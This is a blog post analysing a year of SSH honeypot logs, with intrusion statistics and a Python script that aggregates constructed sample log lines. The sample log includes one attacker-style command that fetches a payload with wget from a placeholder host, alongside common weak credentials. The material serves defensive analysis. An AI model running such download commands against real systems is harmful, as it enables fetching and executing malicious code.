So I’ve been running a Secure shell honeypot for about a year or so, so might as well open up the log files and see what people have been l33ting these days.
For the uninitiated, or for normal people, Secure shell (or SSH) is the traditional method by which people log in remotely to Linux (or other unix-based) servers.
A honeypot pretends to be a standard login server, but instead of logging into a real server, it allows would-be hackers to fairly easily guess their way into a sandbox environment, where they can be prodded and observed to see what they get up to.
The honeypot reacts like a normal server would, logging any input that it receives, and pretends to do the sorts of things that people normally try to do when they gain unauthorised access to a computer system (i.e. the electronic equivalent of putting graffiti in the toilet stalls and having their way with the photocopier).
And now, what with Julia Gillard declaring a new War on Technology and throwing money at a new “cyber security centre” (which will certainly be money well spent), it should be every citizen’s prerogative to try to see what the evil commies are getting up to on their computer networks.
So after pretty much a full day of number-crunching and regexing the 2012 logfiles, and a second full day of fiddling about with databases and WordPress, this is what I’ve got:
| Total number of connections: | 143,039 |
| Total number of unique IP addresses: | 1,488 |
| Total number of logins: | 179,671 |
| Total number of unique usernames: | 18,413 |
| Total number of unique passwords: | 38,010 |
| Total number of unique username/password combinations: | 78,568 |
| Total session time: | 65 days, 7 hours, 51 minutes, 29 seconds |
| (minimum session time): | 0 seconds |
| (average session time): | 39.5 seconds |
| (maximum session time): | 2 days, 13 hours, 35 minutes, 27 seconds |
| Total number of interactive commands: | 394 |
| Total number of non-interactive commands: | 59 |
| Total number of file transfers: | 11 |
Network intrusion statistics
Long sessions are graphed at 1:00:00
If you’re interested in the files people are downloading, these are the ones I’m seeing (with server names redacted to stop you from inadvertently clicking on the things):
That list also includes a Microsoft Windows service pack, amusingly enough.
I would check out these .tgz archives to see what’s in there, but hey… only so many hours in the day.
And it’s always amusing to see the sorts of usernames/passwords that people attempt to jiggle the locks with, so:
Top 20 Login credentials
Top 20 IP addresses
| Korea, Republic of | 5183 | 3.623% |
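The table of totals above and the top-20 credential and IP lists come out of the same kind of per-line regex pass over the honeypot logs. As an added example (not the author’s own scripts and not kippo’s real log format), the script below does that aggregation over a handful of constructed log lines: it counts connections, unique IPs, logins and username/password combinations, pairs each connect with its disconnect to get session durations (leaving a session that never closed out of the duration figures rather than counting it as zero), ranks IPs and credentials with their percentage share, and renders durations with the units in descending order. The log layout, hostnames and IP addresses are all made up for the example.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample lines in a simplified, kippo-like layout (not real honeypot
# output). Session 4 connects but never disconnects, to exercise that edge case.
SAMPLE_LOG = """\
2012-03-01 10:00:00 connect session=1 ip=203.0.113.5
2012-03-01 10:00:02 login session=1 user=root pass=123456 result=failed
2012-03-01 10:00:04 login session=1 user=root pass=password result=succeeded
2012-03-01 10:00:09 command session=1 cmd=wget http://example.invalid/haha.tgz
2012-03-01 10:00:41 disconnect session=1
2012-03-01 11:30:00 connect session=2 ip=198.51.100.7
2012-03-01 11:30:01 login session=2 user=admin pass=admin result=failed
2012-03-01 11:30:03 login session=2 user=root pass=123456 result=failed
2012-03-01 11:30:03 disconnect session=2
2012-03-02 09:00:00 connect session=3 ip=203.0.113.5
2012-03-02 09:00:01 login session=3 user=root pass=123456 result=succeeded
2012-03-04 22:35:28 disconnect session=3
2012-03-02 12:00:00 connect session=4 ip=192.0.2.9
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"(?P<event>connect|login|command|disconnect) "
    r"session=(?P<session>\d+)(?: (?P<rest>.*))?$"
)
# key=value pairs; values in this constructed format contain no whitespace
KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """Return a dict for one log line, or None if the line is not in the expected layout."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rest = m["rest"] or ""
    if m["event"] == "command":
        # The command text may itself contain spaces and '=' signs, so take it whole.
        fields = {"cmd": rest.partition("cmd=")[2]}
    else:
        fields = dict(KV_RE.findall(rest))
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
        "event": m["event"],
        "session": int(m["session"]),
        **fields,
    }


def format_duration(seconds):
    """Render a duration as days, hours, minutes, seconds (largest unit first)."""
    seconds = int(seconds)
    days, rem = divmod(seconds, 86400)
    hours, rem = divmod(rem, 3600)
    minutes, secs = divmod(rem, 60)
    return f"{days} days, {hours} hours, {minutes} minutes, {secs} seconds"


def summarise(log_text, top_n=20):
    """Aggregate the log into the totals and top-N lists a honeypot write-up reports."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    connects = [e for e in events if e["event"] == "connect"]
    logins = [e for e in events if e["event"] == "login"]
    ips = Counter(e["ip"] for e in connects)
    creds = Counter((e["user"], e["pass"]) for e in logins)

    # Pair each connect with its disconnect. Sessions still open at the end of the
    # log (or cut off by a truncated file) are reported separately, not as 0 seconds.
    opened, durations = {}, []
    for e in events:
        if e["event"] == "connect":
            opened[e["session"]] = e["ts"]
        elif e["event"] == "disconnect" and e["session"] in opened:
            durations.append((e["ts"] - opened.pop(e["session"])).total_seconds())
    total = sum(durations)

    return {
        "connections": len(connects),
        "unique_ips": len(ips),
        "logins": len(logins),
        "unique_usernames": len({e["user"] for e in logins}),
        "unique_passwords": len({e["pass"] for e in logins}),
        "unique_credentials": len(creds),
        "commands": sum(e["event"] == "command" for e in events),
        "sessions_unclosed": len(opened),
        "session_time_total": format_duration(total),
        "session_time_min": format_duration(min(durations)) if durations else None,
        "session_time_avg": round(total / len(durations), 1) if durations else None,
        "session_time_max": format_duration(max(durations)) if durations else None,
        # (ip, count, percentage of all connections), mirroring the per-country table
        "top_ips": [(ip, n, round(100.0 * n / len(connects), 3))
                    for ip, n in ips.most_common(top_n)],
        "top_credentials": creds.most_common(top_n),
    }


if __name__ == "__main__":
    for key, value in summarise(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Pointing `summarise` at a real log would mean replacing `LINE_RE` and `KV_RE` with patterns for kippo’s actual line layout; the aggregation and the duration formatting stay the same.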
If I had even a shred of business nous I’d throw that all into a webapp or bundle it into a programmable network appliance and get people to pay me, oh, $200 a pop for it. Leave a message in the comments section below if you’re interested, incidentally.
Not that you can actually do that much with the information, but I guess it’s always nice to know what people are trying to do with random IP addresses out on the internet.
Especially if it’s your random IP addresses out on the internet.
Update 30/1/2013: Added the bit about cacutza in the password section.
Update 6/5/2013: If you find this interesting, you might also want to look at another kippo analysis at http://blog.macuyiko.com/2011/03/running-ssh-honeypot-with-kippo-lets.html .
Really interesting. You should take a look in those files! I’m curious. haha.tgz… gosh.jpg… they are downloading to your honeypot then down to their own servers from there?